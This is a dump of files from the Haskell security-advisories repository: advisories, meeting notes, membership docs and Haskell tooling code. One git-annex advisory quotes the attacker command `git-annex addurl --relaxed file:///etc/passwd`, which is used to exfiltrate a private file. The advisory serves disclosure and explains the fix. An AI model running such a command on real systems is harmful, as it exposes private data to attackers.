"https://github.com/haskell-crypto/cryptonite/blob/cryptonite-v0.30/cbits/ed25519/ed25519.c#53" 36 | [[references]] 37 | type = "EVIDENCE" 38 | url = "https://github.com/kazu-yamamoto/crypton/blob/48fb9df2de5ee752196724b081f4d3cdb57576ed/cbits/ed25519/ed25519.c#L53" 39 | [[references]] 40 | type = "FIX" 41 | url = "https://github.com/kazu-yamamoto/crypton/pull/47" 42 | 43 | ``` 44 | 45 | # Double Public Key Signing Function Oracle Attack on Ed25519 46 | 47 | The standard specification of Ed25519 message signing involves providing the 48 | algorithm with a message and private key. 49 | 50 | The function will use the private key to compute the public key and sign the message. 51 | Some libraries provide a variant of the message signing function that also takes 52 | the pre-computed public key as an input parameter. 53 | 54 | Libraries that allow arbitrary public keys as inputs without checking if the 55 | input public key corresponds to the input private key are vulnerable to the 56 | following attack. 57 | 58 | By using several public keys and messages, a malicious user with access to the 59 | signing mechanism may build up insights into the private key parameters 60 | resulting in access to the private key. 61 | 62 | This shortcoming means that an attacker could use the signing function as an 63 | Oracle, perform crypto-analysis and ultimately get at secrets. 64 | For example, an attacker who can’t access the private key but can access 65 | the signing mechanism through an API call could use several public keys and 66 | messages to gradually build up insights into private key parameters. 67 | -------------------------------------------------------------------------------- /meeting-notes/2024-04-03.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-04-03 2 | 3 | Previous meeting notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-03-20.md 5 | 6 | ## ZuriHac / Haskell Ecosystem Workshop 7 | 8 | - Fraser is going 9 | - Gautier is going 10 | - Mihai will know on Friday if he is attending 11 | - Tristan cannot attend 12 | 13 | ## Quarterly report 14 | 15 | - Draft: https://github.com/haskell/security-advisories/pull/180 16 | - FT asked Mihai to contribute a section for the CI security 17 | recommendations. 18 | 19 | ## VINCE 20 | 21 | - FT reached out to CERT/CC to ask for help 22 | - `security-advisories@haskell.org` is notification-only. 23 | - We should make individual accounts (TOTP required) and they can be 24 | associated with the "Haskell Programming Language" org within 25 | VINCE. 26 | 27 | ## GitHub Actions Runners 28 | 29 | - The reporter was asking what the resolution was. 30 | - Mihai will create a PR with the guidelines documentation and 31 | contact the repo and reporter. 32 | - We cannot fix globally because there is not a single org with all 33 | the Haskell. But we can provide the guidance and recommendations 34 | to the community. 35 | 36 | ## A "security" section within haskell.org 37 | 38 | - Jose: Is there a place for collecting ecosystem-wide best 39 | practices? (whether for security, or more generally) 40 | - We would like a section within haskell.org where our 41 | recommendations and info about the advisory DB lives. A more 42 | "official" documentation about Haskell security and the SRT. 43 | - Perhaps also the wiki. 44 | 45 | ## liblzma/xz vulnerability? 46 | 47 | - The backdoor was inserted using binary data from test suite, and 48 | only during RPM/.deb builds. Even if code was lifted and used in 49 | cbits, the backdoor probably would not be there. 50 | - But we should still verify. FT will ask Casey. 51 | 52 | ## yaml vulnerability 53 | 54 | - Impact and exploitability vector are not clear enough to offer 55 | remediation advice. 56 | - FT will create the advisory. 57 | - We need to check if other yaml packages are affected. 58 | 59 | ## Pull requests 60 | 61 | - [cabal audit (#148)](https://github.com/haskell/security-advisories/pull/148) 62 | - The author is keen on making changes if any more feedback 63 | - He is afraid of going forward with other contributions if he has to rebase 64 | - [cabal audit osv/json (#178)](https://github.com/haskell/security-advisories/pull/178) 65 | 66 | - [hsec-sync (#168)](https://github.com/haskell/security-advisories/pull/168) (merged) 67 | - [hsec-tools snapshot (#179)](https://github.com/haskell/security-advisories/pull/179) 68 | - FT: we want to avoid switching TOML library (again), if we can. 69 | -------------------------------------------------------------------------------- /code/hsec-core/src/Security/Advisories/Core/HsecId.hs: -------------------------------------------------------------------------------- 1 | module Security.Advisories.Core.HsecId 2 | ( 3 | HsecId 4 | , hsecIdYear 5 | , hsecIdSerial 6 | , mkHsecId 7 | , placeholder 8 | , isPlaceholder 9 | , parseHsecId 10 | , printHsecId 11 | , nextHsecId 12 | , getNextHsecId 13 | ) where 14 | 15 | import Control.Monad (guard, join) 16 | 17 | import Data.Time (getCurrentTime, utctDay) 18 | import Data.Time.Calendar.OrdinalDate (toOrdinalDate) 19 | 20 | import Safe (readMay) 21 | 22 | data HsecId = HsecId Integer Integer 23 | deriving (Eq, Ord) 24 | 25 | instance Show HsecId where 26 | show = printHsecId 27 | 28 | -- | Make an 'HsecId'. Year and serial must both be positive, or 29 | -- else both must be zero (the 'placeholder'). 30 | mkHsecId 31 | :: Integer -- ^ Year 32 | -> Integer -- ^ Serial number within year 33 | -> Maybe HsecId 34 | mkHsecId y n 35 | | y > 0 && n > 0 || y == 0 && n == 0 = Just $ HsecId y n 36 | | otherwise = Nothing 37 | 38 | hsecIdYear :: HsecId -> Integer 39 | hsecIdYear (HsecId y _) = y 40 | 41 | hsecIdSerial :: HsecId -> Integer 42 | hsecIdSerial (HsecId _ n) = n 43 | 44 | -- | The placeholder ID: __HSEC-0000-0000__. 45 | -- See also 'isPlaceholder'. 46 | placeholder :: HsecId 47 | placeholder = HsecId 0 0 48 | 49 | -- | Test whether an ID is the 'placeholder' 50 | isPlaceholder :: HsecId -> Bool 51 | isPlaceholder = (==) placeholder 52 | 53 | -- | Parse an 'HsecId'. The 'placeholder' is accepted. 54 | parseHsecId :: String -> Maybe HsecId 55 | parseHsecId s = case s of 56 | 'H':'S':'E':'C':'-':t -> 57 | let 58 | (y, t') = break (== '-') t 59 | n = drop 1 t' 60 | in do 61 | guard $ length y >= 4 -- year must have at least 4 digits 62 | guard $ length n >= 4 -- serial must have at least 4 digits 63 | join $ mkHsecId <$> readMay y <*> readMay n 64 | _ -> Nothing 65 | 66 | printHsecId :: HsecId -> String 67 | printHsecId (HsecId y n) = "HSEC-" <> pad (show y) <> "-" <> pad (show n) 68 | where 69 | pad s = replicate (4 - length s) '0' <> s 70 | 71 | -- | Given a year and an HSEC ID, return a larger HSEC ID. This 72 | -- function, when given the current year and the greatest allocated 73 | -- HSEC ID, returns the next HSEC ID to allocate. 74 | -- 75 | nextHsecId 76 | :: Integer -- ^ Current year 77 | -> HsecId 78 | -> HsecId 79 | nextHsecId curYear (HsecId idYear n) 80 | | curYear > idYear = HsecId curYear 1 81 | | otherwise = HsecId idYear (n + 1) 82 | 83 | -- | Get the current time, and return an HSEC ID greater than the 84 | -- given HSEC ID. The year of the returned HSEC ID is the current 85 | -- year. 86 | -- 87 | getNextHsecId 88 | :: HsecId 89 | -> IO HsecId 90 | getNextHsecId oldId = do 91 | t <- getCurrentTime 92 | let (year, _dayOfYear) = toOrdinalDate (utctDay t) 93 | pure $ nextHsecId year oldId 94 | -------------------------------------------------------------------------------- /meeting-notes/2023-06-15.md: -------------------------------------------------------------------------------- 1 | # SRT 2023-06-15 2 | 3 | ## Present 4 | - Gautier 5 | - Casey 6 | - Mihai 7 | - Fraser 8 | - David 9 | 10 | ## Apology from David 11 | 12 | David apologized for not being there to let people into the meeting room. He will change the invite to a jit.si link for next time. 13 | 14 | ## How to make the announcement 15 | 16 | - official announcement: on discourse 17 | - David: suggests doing so after there are ~5 real advisories in the repo 18 | - We should give a few days heads up to projects that the public might think support it but don't at the start 19 | - Announcement should include: 20 | - Short-term plans (e.g. OSV integration) 21 | - Long-term goals (cabal audit, Stack, Hackage, etc) 22 | - Fraser will draft on mailing list next week 23 | 24 | ## Initial content 25 | 26 | - List of known security issues: https://github.com/haskell/security-advisories/issues/32 27 | - We should validate that the CVSS is correct while creating the advisory, rather than taking it at face value 28 | - Relevant post: https://daniel.haxx.se/blog/2023/06/12/nvd-damage-continued/ 29 | - Fraser plans to work on a CVSS toolkit in Haskell 30 | - David will create one for the TOML parser on Monday 31 | 32 | ## ZuriHac 33 | 34 | - a lot of people were excited 35 | - folks wondered why it was empty 36 | - One volunteer pull request 37 | - FT it was a great contribution! 38 | - David's general comments: 39 | - GHC workshop went well 40 | - Getting folks together to contribute to important core stuff is very good. 41 | - Future thoughts: projects for Cabal / Hackage integration. 42 | 43 | ## Other community interest 44 | - Casey: Should we look into letting Linux distributions know about us so we can get their reports? 45 | - Fraser: Let's rely on the OSV tooling and hope that projects are consuming those streams. Also, most distros package only the dependencies for particular programs they want (e.g. pandoc) so we would have (a little) extra work to determine which distros are affected by an advisory. 46 | 47 | 48 | # hsec-tools tooling 49 | 50 | - support for multiple references, instead of single-valued "url" field, with the types supported by OSV (e.g. advisory, blog post, etc) 51 | - We presently parse it as CommonMark, but we store the rendered HTML in the advisory datatype. We should instead store the CommonMark, because that's what's needed for OSV. 52 | - Store original text or AST or both? We should try and see. 53 | - Can we migrate to `pandoc-types`? David didn't pick them to avoid GPL constraints, but it seems that the Pandoc integration is doable with BSD after all (the types package is BSD3). We should migrate. 54 | - *pandoc* is GPL, so static site builder w/ Hakyll needs to be a separate package under GPL, which consumes our libraries. 55 | - We should (not urgent) extract OSV bits to a dedicated package. 56 | - FT plans to write a CVSS library. -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0013.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0013" 4 | cwe = [312] 5 | keywords = ["historical"] 6 | aliases = ["CVE-2014-6274"] 7 | 8 | [[affected]] 9 | package = "git-annex" 10 | cvss = "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" 11 | [[affected.versions]] 12 | introduced = "0.20110401" 13 | fixed = "5.20140919" 14 | 15 | [[references]] 16 | type = "ADVISORY" 17 | url = "https://git-annex.branchable.com/security/CVE-2014-6274/" 18 | [[references]] 19 | type = "ARTICLE" 20 | url = "https://git-annex.branchable.com/upgrades/insecure_embedded_creds/" 21 | ``` 22 | 23 | # *git-annex* plaintext storage of embedded credentials on encrypted remotes 24 | 25 | *git-annex* had a bug in the **S3** and **Glacier** remotes where if 26 | `embedcreds=yes` was set, and the remote used `encryption=pubkey` or 27 | `encryption=hybrid`, the embedded AWS credentials were stored in the 28 | Git repository in (effectively) plaintext, not encrypted as they 29 | were supposed to be. 30 | 31 | That means that anyone who gets a copy of the Git repository can 32 | extract the AWS credentials from it. Which would be bad. 33 | 34 | A remote with this problem cannot be enabled using `git annex 35 | enableremote`. Old versions of *git-annex* will fail with a GPG 36 | error; the current version will fail with a pointer to this web 37 | page. 38 | 39 | ## Remediation 40 | 41 | If your repository has this problem, chose from one of these 42 | approaches to deal with it: 43 | 44 | 1. Change your AWS credentials, so the ones stored in the clear in 45 | git won't be used. 46 | 47 | After changing the credentials, make sure you have a fixed 48 | version of git-annex, and you can then re-embed the new creds 49 | into the repository, encrypted this time, by setting the 50 | `AWS_SECRET_ACCESS_KEY` and `AWS_ACCESS_KEY_ID` environment 51 | variables, and running `git annex enableremote $remotename 52 | embedcreds=yes`. 53 | 54 | 2. Fix the problem and then remove the history of the *git-annex* 55 | branch of the repository. 56 | 57 | Make sure you have a fixed version of *git-annex*, and force 58 | *git-annex* to rewrite the embedded creds, with encryption this 59 | time, by setting by setting the `AWS_SECRET_ACCESS_KEY` and 60 | `AWS_ACCESS_KEY_ID` environment variables, and running `git annex 61 | enableremote $remotename embedcreds=yes`. 62 | 63 | Then, to get rid of old versions of the *git-annex* branch that 64 | still contains the creds in cleartext, you can use `git annex 65 | forget`; note that it will remove other historical data too. 66 | 67 | Keep in mind that this will not necessarily delete data from 68 | clones you do not control. 69 | 70 | 3. If you're sure that you're the only one who has access to the 71 | repository, you could decide to leave it as-is. It's no more 72 | insecure than if you had used `encryption=shared` in the first 73 | place when setting it up. 74 | -------------------------------------------------------------------------------- /docs/membership.md: -------------------------------------------------------------------------------- 1 | # SRT members and membership processes 2 | 3 | ## Current members 4 | 5 | - Fraser Tweedale (SRT project leader; 2023-05–) 6 | - Gautier Di Folco (2023-05–) 7 | - Lei Zhu (2024-10–) 8 | - Mihai Maruseac (2023-05–) 9 | - Montez Fitzpatrick (2024-10–) 10 | - Tristan de Cacqueray (2023-05–) 11 | 12 | ## Former members 13 | 14 | We thank past members for their valuable contributions! 15 | 16 | - Casey Mattingly (2023-05–2024-06) 17 | 18 | ## Member onboarding (and offboarding) 19 | 20 | There are some necessary tasks when members join or leave the SRT. 21 | These are: 22 | 23 | - Update the member lists in this document. 24 | 25 | - Add (or remove) the member from the 26 | `security-advisories[at]haskell.org` mailing list. Contact the 27 | [Haskell Infrastructure Admins][haskell-infra] for assistance. 28 | 29 | - Add (or remove) the member from the VINCE group, if they are 30 | participating in that capacity. 31 | 32 | - Update the member list at https://www.haskell.org/security/. 33 | By pull request against 34 | [haskell-infra/www.haskell.org](https://github.com/haskell-infra/www.haskell.org/). 35 | 36 | - Announce the membership change(s) on [Discourse]. Usually this 37 | could be included in the quarterly report. 38 | 39 | - Add (or remove) the member as a maintainer of SRT-owned [Hackage 40 | packages](./packages.md), if appropriate. 41 | 42 | [haskell-infra]: https://github.com/haskell-infra/haskell-admins 43 | [Discourse]: https://discourse.haskell.org/ 44 | 45 | 46 | ## Running a Call for Volunteers 47 | 48 | To fill vacancies or grow the SRT, run a *Call for Volunteers*. 49 | The following is a rough guide on how we do that. 50 | 51 | - For previous calls, we appointed an SRT member to receive the 52 | applications (to their personal email address). 53 | 54 | - *After applications close*, they compile the applications and 55 | share with the rest of the SRT for review. We start a voting 56 | thread on the mailing list, each member states their preferred 57 | applicant(s) with summary reasons, and we reach a consensus. This 58 | process has worked well, so far. 59 | 60 | - See [example content](call-for-volunteers-example.md). There are 61 | some placeholders to be filled. The content can be modified as 62 | needed. 63 | 64 | - Publish the call on [Discourse] and promote it in the logical ways 65 | (e.g. Haskell Foundation social media, r/haskell, etc). 66 | 67 | - The application period should be about 4 weeks. Bump and do 68 | another burst of promotion at the halfway point. 69 | 70 | - After the application deadline, the full SRT membership reviews 71 | the proposals and selects the new member(s). 72 | 73 | - Notify the successful applicant(s) and seek their affirmation that 74 | they are prepared to join the SRT. 75 | 76 | - Notify unsuccessful applicants before public announcement of the 77 | outcome. 78 | 79 | - Commence onboarding and notify the community of the outcome. 80 | -------------------------------------------------------------------------------- /meeting-notes/2023-08-09.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-08-09 2 | 3 | [Previous meeting notes](https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-07-26.md) 4 | 5 | ## Previous AIs: 6 | 7 | - Mihai 8 | - Will follow up for project contacts for embargoed issues 9 | - Look into GHCup #858 -- still in progress 10 | - Everyone 11 | - Send David the email address used by your Bitwarden account 12 | so it can be added to HF's organization. 13 | - FT 14 | - Documentation of repo structure, including symlinks 15 | - Documentation about dates - that they are retieved from Git history 16 | - full history required, not shallow clone 17 | - Create GH issue to design HSEC ID reservation feature 18 | - re Base readFloat, update bgamari that advisory exists 19 | - ping pandoc folks, ask them to submit advisories 20 | - someone 21 | - Requirements/guidelines for dependency analysis tooling 22 | - Start writing them down, commit to our repo 23 | 24 | ## Pandoc 25 | 26 | - New pandoc issue: https://github.com/jgm/pandoc/security/advisories/GHSA-xj5q-fv23-575g 27 | - Related issue: https://github.com/jgm/pandoc/issues/8584 28 | - Security section of manual: https://pandoc.org/MANUAL.html#a-note-on-security 29 | 30 | 31 | ## Recording affected symbols 32 | 33 | - Tristan looking into it 34 | - Some doubts about how to record e.g. type class instances 35 | - GitHub issue we can use for discussion: https://github.com/haskell/security-advisories/issues/86 *"Leverage the declaration field to specify which function is affected"* 36 | 37 | 38 | ## ID reservation 39 | 40 | - PR: https://github.com/haskell/security-advisories/pull/114 41 | - `hsec-tools reserve-id --assign --commit` 42 | - TODO: add diagnostic output e.g. "Reserved HSEC-YYYY-NNNN.md" 43 | 44 | 45 | ## Publishing hsec-tools to hackage? 46 | 47 | - We should probably do it some time :) 48 | - Maybe extract OSV library first, and land the toml library change first 49 | 50 | ## Purl parsing 51 | 52 | - [spec](https://github.com/package-url/purl-spec) 53 | - [Hackage](https://github.com/package-url/purl-spec/blob/master/PURL-TYPES.rst#hackage) 54 | - Casey started work on this 55 | - We should define and propose to haskell community a *profile* of Purl, in particular how to represent 56 | - Package components (`lib`, `exe:`, `lib:`) 57 | - Cabal flags (`[+-]`) 58 | - There is a hackage namespace defined for Purl, but it does not suggest how to represent these data 59 | 60 | 61 | ## Action Items 62 | - Bitwarden accounts? 63 | - Mihai: 64 | - Progress on embargoed items 65 | - Look into GHCup #858 -- still in progress 66 | - Tristan: rebase the toml-parser PR#88 67 | 68 | - David: Encourage Pandoc devs to test out our advisory process 69 | - FT: Documentation of repo structure 70 | - FT: Diagnostic output (created file XYZ) 71 | - FT to publish PR for (currently WIP) enhancement to record package components in HSEC security-advisories 72 | -------------------------------------------------------------------------------- /code/hsec-sync/hsec-sync.cabal: -------------------------------------------------------------------------------- 1 | cabal-version: 2.4 2 | name: hsec-sync 3 | version: 0.2.0.2 4 | 5 | -- A short (one-line) description of the package. 6 | synopsis: Synchronize with the Haskell security advisory database 7 | 8 | -- A longer description of the package. 9 | description: Synchronize with the Haskell security advisory database. 10 | 11 | -- A URL where users can report bugs. 12 | -- bug-reports: 13 | 14 | -- The license under which the package is released. 15 | license: BSD-3-Clause 16 | author: Gautier DI FOLCO 17 | maintainer: gautier.difolco@gmail.com 18 | 19 | -- A copyright notice. 20 | -- copyright: 21 | category: Data 22 | extra-doc-files: CHANGELOG.md, overview.png, recommended-workflow.png, README.md 23 | tested-with: 24 | GHC ==8.10.7 || ==9.0.2 || ==9.2.8 || ==9.4.8 || ==9.6.6 || ==9.8.3 || ==9.10.1 || ==9.12.1 25 | 26 | library 27 | exposed-modules: Security.Advisories.Sync 28 | other-modules: 29 | Security.Advisories.Sync.Snapshot 30 | Security.Advisories.Sync.Url 31 | 32 | build-depends: 33 | , base >=4.14 && <5 34 | , bytestring >=0.10 && <0.13 35 | , directory >=1.3 && <1.4 36 | , either >=5.0 && <5.1 37 | , extra >=1.7 && <1.9 38 | , filepath >=1.4 && <1.6 39 | , http-client >=0.7.0 && <0.8 40 | , lens >=5.1 && <5.4 41 | , tar >=0.5 && <0.7 42 | , temporary >=1 && <2 43 | , text >=1.2 && <3 44 | , transformers >=0.5 && <0.7 45 | , wreq >=0.5 && <0.6 46 | , zlib >=0.6 && <0.8 47 | 48 | hs-source-dirs: src 49 | default-language: Haskell2010 50 | ghc-options: 51 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 52 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 53 | 54 | executable hsec-sync 55 | main-is: Main.hs 56 | 57 | -- Modules included in this executable, other than Main. 58 | -- other-modules: 59 | 60 | -- LANGUAGE extensions used by modules in this package. 61 | -- other-extensions: 62 | build-depends: 63 | , base >=4.14 && <5 64 | , hsec-sync 65 | , optparse-applicative >=0.17 && <0.19 66 | 67 | hs-source-dirs: app 68 | default-language: Haskell2010 69 | ghc-options: 70 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 71 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 72 | 73 | test-suite spec 74 | type: exitcode-stdio-1.0 75 | hs-source-dirs: test 76 | main-is: Spec.hs 77 | other-modules: Spec.SyncSpec 78 | build-depends: 79 | , base 80 | , directory 81 | , filepath 82 | , hsec-sync 83 | , tasty <2 84 | , tasty-hunit <0.11 85 | , temporary >=1 && <2 86 | 87 | default-language: Haskell2010 88 | ghc-options: 89 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 90 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 91 | -------------------------------------------------------------------------------- /code/hsec-sync/src/Security/Advisories/Sync.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE DerivingStrategies #-} 2 | {-# LANGUAGE LambdaCase #-} 3 | 4 | module Security.Advisories.Sync 5 | ( Snapshot (..), 6 | SnapshotUrl (..), 7 | defaultSnapshot, 8 | githubSnapshot, 9 | SyncStatus (..), 10 | sync, 11 | RepositoryStatus (..), 12 | status, 13 | ) 14 | where 15 | 16 | import Control.Monad.IO.Class (liftIO) 17 | import Control.Monad.Trans.Except (runExceptT, withExceptT) 18 | import Security.Advisories.Sync.Snapshot 19 | import Security.Advisories.Sync.Url 20 | 21 | data Snapshot = Snapshot 22 | { snapshotRoot :: FilePath, 23 | snapshotUrl :: SnapshotUrl 24 | } 25 | 26 | defaultSnapshot :: Snapshot 27 | defaultSnapshot = 28 | githubSnapshot 29 | "security-advisories" 30 | "https://github.com/haskell/security-advisories" 31 | "generated/snapshot-export" 32 | 33 | githubSnapshot :: FilePath -> String -> String -> Snapshot 34 | githubSnapshot root repoUrl repoBranch = 35 | Snapshot 36 | { snapshotRoot = root, 37 | snapshotUrl = SnapshotUrl $ ensureFile (mkUrl [repoUrl, "archive/refs/heads", repoBranch]) <> ".tar.gz" 38 | } 39 | 40 | data SyncStatus 41 | = Created 42 | | Updated 43 | | AlreadyUpToDate 44 | deriving stock (Eq, Show) 45 | 46 | sync :: Snapshot -> IO (Either String SyncStatus) 47 | sync s = 48 | runExceptT $ do 49 | snapshotStatus <- liftIO $ snapshotRepositoryStatus $ snapshotRoot s 50 | ensuredStatus <- withExceptT explainSnapshotError $ ensureSnapshot (snapshotRoot s) (snapshotUrl s) snapshotStatus 51 | case ensuredStatus of 52 | SnapshotRepositoryCreated -> 53 | return Created 54 | SnapshotRepositoryExisting -> do 55 | repoStatus <- liftIO $ status' s snapshotStatus 56 | if repoStatus == DirectoryOutDated 57 | then do 58 | withExceptT explainSnapshotError $ overwriteSnapshot (snapshotRoot s) (snapshotUrl s) 59 | return Updated 60 | else return AlreadyUpToDate 61 | 62 | data RepositoryStatus 63 | = DirectoryMissing 64 | | -- | Used when expected files/directories are missing or not readable 65 | DirectoryIncoherent 66 | | DirectoryUpToDate 67 | | DirectoryOutDated 68 | deriving stock (Eq, Show) 69 | 70 | status :: Snapshot -> IO RepositoryStatus 71 | status s = 72 | status' s =<< snapshotRepositoryStatus (snapshotRoot s) 73 | 74 | status' :: Snapshot -> SnapshotRepositoryStatus -> IO RepositoryStatus 75 | status' s = 76 | \case 77 | SnapshotDirectoryMissing -> 78 | return DirectoryMissing 79 | SnapshotDirectoryIncoherent -> 80 | return DirectoryIncoherent 81 | SnapshotDirectoryInitialized -> do 82 | snapshotInfo <- getDirectorySnapshotInfo $ snapshotRoot s 83 | case snapshotInfo of 84 | Left _ -> 85 | return DirectoryOutDated 86 | Right info -> do 87 | update <- runExceptT $ latestUpdate $ snapshotUrl s 88 | return $ 89 | case update of 90 | Right latestETag | latestETag == etag info -> 91 | DirectoryUpToDate 92 | _ -> 93 | DirectoryOutDated 94 | -------------------------------------------------------------------------------- /EXAMPLE_ADVISORY.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | 3 | [advisory] 4 | # Submit PRs with HSEC-0000-0000, or run `hsec-tools next-id` to 5 | # print the next available ID. 6 | id = "HSEC-0000-0000" 7 | cwe = [] 8 | 9 | # Arbitrary keywords. We recommend to include keywords relating 10 | # to the protocols, data formats or services pertaining to the 11 | # affected package (e.g. "json", "tls", "aws"). You can also 12 | # include keywords describing the vulnerability or impact (e.g. 13 | # "dos", "sqli" "csrf"). Just think, "what keywords would I use 14 | # if I was searching for issues affecting this package, or a 15 | # particular class of vulnerabilities?" 16 | keywords = ["example", "freeform", "keywords"] 17 | 18 | # Corresponding and related advisory IDs. You could include 19 | # CVE, GHSA or other well known databases, as well as other 20 | # HSEC IDs in the `related` field. 21 | aliases = ["CVE-2022-XXXX"] 22 | related = ["CVE-2022-YYYY", "CVE-2022-ZZZZ"] 23 | 24 | # You can declare multiple affected packages 25 | [[affected]] 26 | 27 | # Declare the affected package/component via ONE of the 28 | # following options 29 | # 30 | # OPTION 1: package = hackage-package-name 31 | package = "package-name" 32 | # 33 | # OPTION 2: alternative-hackage-package = hackage-package-name 34 | # repository-url = "https//hackage.example.org/" 35 | # repository-name = "example" 36 | # package = "package-name" 37 | # 38 | # OPTION 3: ghc-component = {ghc,ghci,rts,ghc-pkg,runghc,ghc-iserv,hp2ps,hpc,hsc2hs,haddock} 39 | # ghc-component = "ghci" 40 | 41 | # CVSS vector. Accepted versions: 2.0, 3.0, 3.1 42 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" 43 | 44 | # arch = ["x86", "x86_64"] 45 | # os = ["mingw32"] 46 | # declarations = { "Acme.Broken.function" = ">= 1.1.0 && < 1.2.0", "Acme.Broken.renamedFunction" = ">= 1.2.0 && < 1.2.0.5"} 47 | 48 | # Versions affected by the vulnerability. 49 | # 50 | # The `fixed` field is optional. You can specify multiple ranges 51 | # (for example, if the issue was introduced in multiple releases 52 | # series). In the case of multiple ranges, use `fixed` to "close" 53 | # a range, even when the release series does not actually have a 54 | # fix. For example, if an issue was introduced in 1.0.8 and 1.1.2 55 | # (but 1.1 is unaffected), and a fix has not been released for the 56 | # 1.0.x series, specify: 57 | [[affected.versions]] 58 | introduced = "1.0.8" 59 | fixed = "1.1" 60 | [[affected.versions]] 61 | introduced = "1.1.2" 62 | 63 | # References to articles, issues/PRs, etc. Recognised types: 64 | # ADVISORY, ARTICLE, DETECTION, DISCUSSION, REPORT, 65 | # FIX, INTRODUCED, PACKAGE, EVIDENCE, WEB 66 | [[references]] 67 | type = "ARTICLE" 68 | url = "https://example.com" 69 | ``` 70 | 71 | # Advisory Template - Title Goes Here 72 | 73 | This is an example template for an advisory. Please copy this to packages/ and rename it to HSEC-0000-0000.md. 74 | 75 | In this section of the advisory you can write an extended description of the vulnerability. 76 | 77 | * Markdown formatted 78 | * TOML "front matter". See README.md for schema. 79 | * Please include as much detail as you'd like. 80 | 81 | A well structured advisory will include information like: 82 | 83 | > Acme Broken implements safe internal mutation using `unsafePerformIO`. However, in a multithreaded context, an attacker can cause a service to return the wrong answer by forcing an interleaving of writes that violates internal invariants. The flaw was corrected by replacing uses of `IORef` with `MVar` in commit abc123. 84 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0010.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0010" 4 | cwe = [200, 610] 5 | keywords = ["exfiltration", "historical"] 6 | aliases = ["CVE-2018-10857"] 7 | 8 | [[affected]] 9 | package = "git-annex" 10 | cvss = "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" 11 | [[affected.versions]] 12 | introduced = "0" 13 | fixed = "6.20180626" 14 | 15 | [[references]] 16 | type = "ADVISORY" 17 | url = "https://git-annex.branchable.com/security/CVE-2018-10857_and_CVE-2018-10859/" 18 | ``` 19 | 20 | # *git-annex* private data exfiltration to compromised remote 21 | 22 | Some uses of git-annex were vulnerable to a private data exposure 23 | and exfiltration attack. It could expose the content of files 24 | located outside the *git-annex* repository, or content from a 25 | private web server on localhost or the LAN. Joey Hess discovered 26 | this attack. 27 | 28 | To perform this attack, the attacker needs to have control over one 29 | of the remotes of the victim's *git-annex* repository. For example, 30 | they may provide a public *git-annex* repository that the victim 31 | clones. Or, equivalantly, the attacker could have read access to the 32 | victim's *git-annex* repository or a repository it pushes to, and 33 | some channel to get commits into it (e.g. pull requests). 34 | 35 | These exploits are most likely to succeed when the victim is running 36 | the `git-annex` assistant, or is periodically running `git annex 37 | sync --content`. 38 | 39 | To perform the attack the attacker runs `git-annex addurl --relaxed 40 | file:///etc/passwd` and commits this to the repository in some out 41 | of the way place. After the victim's git repository receives that 42 | change, `git-annex` follows the attacker-provided URL to the private 43 | data, which it stores in the *git-annex* repository. From there it 44 | transfers the content to the remote *git-annex* repository that the 45 | attacker has access to. 46 | 47 | As well as `file:///` URLs, the attacker can use URLs to private web 48 | servers. The URL can also be one that the attacker controls, that 49 | redirects to a URL that is accessible to the victim system (and not 50 | necessarily the compromised remote). 51 | 52 | ## Fix 53 | 54 | The issue was fixed by making `git-annex` refuse to follow 55 | `file:///` urls and URLs pointing to private/local IP addresses by 56 | default. Two new configuration settings, 57 | `annex.security.allowed-url-schemes` and 58 | `annex.security.allowed-ip-addresses`, can relax this security 59 | policy, and are intended for cases where the *git-annex* repository 60 | is kept private and so the attack does not apply. 61 | 62 | ## Impact on external special remotes 63 | 64 | One variant of this issue can exploit a vulnerable external special 65 | remote, and could not be prevented by `git-annex`. (`git-annex`'s 66 | own built-in special remotes are not vulnerable to this attack.) 67 | 68 | In this attack variant, the attacker guesses the hash of a file 69 | stored on the victim's private web server, and adds it to the 70 | `git-annex` repository. The attacker also has control of the server 71 | hosting an encrypted special remote used by the victim's *git-annex* 72 | repository. They cause that server to redirect to the victim's web 73 | server. This allows the attacker to verify if the victim's web 74 | server contains a file that the attacker already knows the content 75 | of, assuming they can guess the URL to it. 76 | 77 | Developers of external special remotes are encouraged to prevent 78 | this attack by not following such HTTP redirects. 79 | -------------------------------------------------------------------------------- /code/hsec-sync/app/Main.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE OverloadedStrings #-} 2 | 3 | module Main where 4 | 5 | import Control.Monad (join) 6 | import Options.Applicative 7 | import Security.Advisories.Sync 8 | import System.Exit (die) 9 | import System.IO (hPutStrLn, stderr) 10 | 11 | main :: IO () 12 | main = 13 | join $ 14 | customExecParser 15 | (prefs showHelpOnEmpty) 16 | cliOpts 17 | 18 | cliOpts :: ParserInfo (IO ()) 19 | cliOpts = info (commandsParser <**> helper) (fullDesc <> header "Haskell Advisories tools") 20 | where 21 | commandsParser :: Parser (IO ()) 22 | commandsParser = 23 | hsubparser 24 | ( command "sync" (info commandSync (progDesc "Synchronize a local Haskell Security Advisory repository snapshot")) 25 | <> command "status" (info commandStatus (progDesc "Check the status of a local Haskell Security Advisory repository snapshot")) 26 | ) 27 | 28 | commandSync :: Parser (IO ()) 29 | commandSync = go <$> repositoryParser 30 | where 31 | go snapshot = do 32 | result <- sync snapshot 33 | case result of 34 | Left e -> 35 | die e 36 | Right s -> do 37 | putStrLn $ 38 | "Snapshot at " 